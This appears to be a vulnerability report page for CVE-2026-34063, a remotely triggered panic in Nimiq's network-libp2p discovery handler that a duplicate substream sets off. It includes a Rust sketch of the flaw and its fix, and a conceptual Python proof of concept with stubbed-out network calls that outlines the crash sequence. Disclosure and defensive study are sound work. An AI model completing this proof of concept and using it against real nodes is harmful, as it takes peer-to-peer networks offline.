Security Vulnerability Report
CVE-2026-34063 CVSS 7.5 HIGH

CVE-2026-34063

Published: 2026-04-22 20:16:41
Last Modified: 2026-04-24 17:12:23

Description

Nimiq's network-libp2p is a Nimiq network implementation based on libp2p. Prior to version 1.3.0, `network-libp2p` discovery uses a libp2p `ConnectionHandler` state machine. The handler assumes there is at most one inbound and one outbound discovery substream per connection. If a remote peer opens/negotiates the discovery protocol substream a second time on the same connection, the handler hits a `panic!("Inbound already connected")` / `panic!("Outbound already connected")` path instead of failing closed. This causes a remote crash of the networking task (swarm), taking the node's p2p networking offline until restart. The patch for this vulnerability is formally released as part of v1.3.0. No known workarounds are available.
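
The failure mode described above, as an added Rust sketch that is neither Nimiq's code nor the v1.3.0 patch: `on_inbound_panicking` reproduces the panic-on-duplicate pattern, while `on_substream` shows a fail-closed alternative that returns an error and flags only the offending connection. `DiscoveryHandler`, `HandlerError`, the method names and the `u32` substream stand-in are assumptions made for the example.

```rust
use std::panic::{catch_unwind, AssertUnwindSafe};

#[derive(Debug, PartialEq)]
pub enum Direction { Inbound, Outbound }
#[derive(Debug, PartialEq)]
pub enum HandlerError { DuplicateSubstream(Direction) }

/// Hypothetical per-connection state, not Nimiq's type; a u32 stands in for a substream.
#[derive(Default)]
pub struct DiscoveryHandler {
    pub inbound: Option<u32>,
    pub outbound: Option<u32>,
    pub closing: bool,
}

impl DiscoveryHandler {
    /// Pattern the advisory describes: a peer-controlled event reaches `panic!`.
    pub fn on_inbound_panicking(&mut self, s: u32) {
        if self.inbound.is_some() {
            panic!("Inbound already connected");
        }
        self.inbound = Some(s);
    }

    /// Fail closed: reject the duplicate, keep the first substream, flag the connection.
    pub fn on_substream(&mut self, dir: Direction, s: u32) -> Result<(), HandlerError> {
        let slot = match dir {
            Direction::Inbound => &mut self.inbound,
            Direction::Outbound => &mut self.outbound,
        };
        if slot.is_some() {
            self.closing = true; // caller drops only this peer's connection
            return Err(HandlerError::DuplicateSubstream(dir));
        }
        *slot = Some(s);
        Ok(())
    }
}

/// True when a duplicate inbound substream unwinds the calling task.
pub fn legacy_panics_on_duplicate() -> bool {
    let mut h = DiscoveryHandler::default();
    h.on_inbound_panicking(1);
    catch_unwind(AssertUnwindSafe(|| h.on_inbound_panicking(2))).is_err()
}

fn main() {
    let mut h = DiscoveryHandler::default();
    let (a, b) = (h.on_substream(Direction::Inbound, 1), h.on_substream(Direction::Inbound, 2));
    println!("{:?} {:?} closing={} legacy_panics={}", a, b, h.closing, legacy_panics_on_duplicate());
}
```

In the fail-closed variant the duplicate becomes an error scoped to one connection, so the task that drives every other peer keeps running.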

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nimiq:nimiq_proof-of-stake:*:*:*:*:*:rust:*:* - VULNERABLE
nimiq/network-libp2p < 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import asyncio
import logging

# This is a conceptual PoC to demonstrate the vulnerability trigger logic.
# Actual exploitation requires implementing the libp2p protocol handshake.


async def trigger_vulnerability(target_ip, target_port):
    logging.basicConfig(level=logging.INFO)

    # 1. Establish a connection to the target Nimiq node
    # In a real scenario, this would be a libp2p TCP connection
    logging.info(f"Connecting to {target_ip}:{target_port}...")
    # reader, writer = await asyncio.open_connection(target_ip, target_port)

    # 2. Perform libp2p handshake (Multistream-select)
    # Assuming handshake succeeds and connection is established
    logging.info("Connection established. Simulating discovery substream...")

    # 3. Open first discovery substream (Normal behavior)
    # The handler accepts this and sets state to 'connected'
    logging.info("Opening first discovery substream...")
    # send_protocol_request(writer, "/nimiq/1.0.0/discovery")

    # 4. Open second discovery substream (Trigger vulnerability)
    # The handler expects only one substream. Opening a second one
    # triggers the panic: "Inbound/Outbound already connected"
    logging.info("Opening second discovery substream (Triggering Panic)...")
    # send_protocol_request(writer, "/nimiq/1.0.0/discovery")

    # Result: The remote node's task panics and crashes, taking the P2P network offline.
    logging.info("Attack packet sent. Remote node should crash.")
    # writer.close()
    # await writer.wait_closed()


if __name__ == "__main__":
    # Replace with actual target
    asyncio.run(trigger_vulnerability("127.0.0.1", 8444))
```

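References

https://github.com/nimiq/core-rs-albatross/commit/e0d4e01994f061bf41d3c2835bc74040d3c084f5 (Patch)
https://github.com/nimiq/core-rs-albatross/pull/3666 (Issue Tracking, Patch)
https://github.com/nimiq/core-rs-albatross/releases/tag/v1.3.0 (Release Notes)
https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-74hp-mhfx-m45h (Patch, Vendor Advisory)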

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34063", "sourceIdentifier": "[email protected]", "published": "2026-04-22T20:16:40.713", "lastModified": "2026-04-24T17:12:23.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nimiq's network-libp2p is a Nimiq network implementation based on libp2p. Prior to version 1.3.0, `network-libp2p` discovery uses a libp2p `ConnectionHandler` state machine. the handler assumes there is at most one inbound and one outbound discovery substream per connection. if a remote peer opens/negotiate the discovery protocol substream a second time on the same connection, the handler hits a `panic!(\\\"Inbound already connected\\\")` / `panic!(\\\"Outbound already connected\\\")` path instead of failing closed. This causes a remote crash of the networking task (swarm), taking the node's p2p networking offline until restart. The patch for this vulnerability is formally released as part of v1.3.0. No known workarounds are available."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nimiq:nimiq_proof-of-stake:*:*:*:*:*:rust:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "CD0CAAD1-7626-4A4A-A6F8-9DC46FE50731"}]}]}], "references": [{"url": "https://github.com/nimiq/core-rs-albatross/commit/e0d4e01994f061bf41d3c2835bc74040d3c084f5", 
"source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nimiq/core-rs-albatross/pull/3666", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/nimiq/core-rs-albatross/releases/tag/v1.3.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-74hp-mhfx-m45h", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}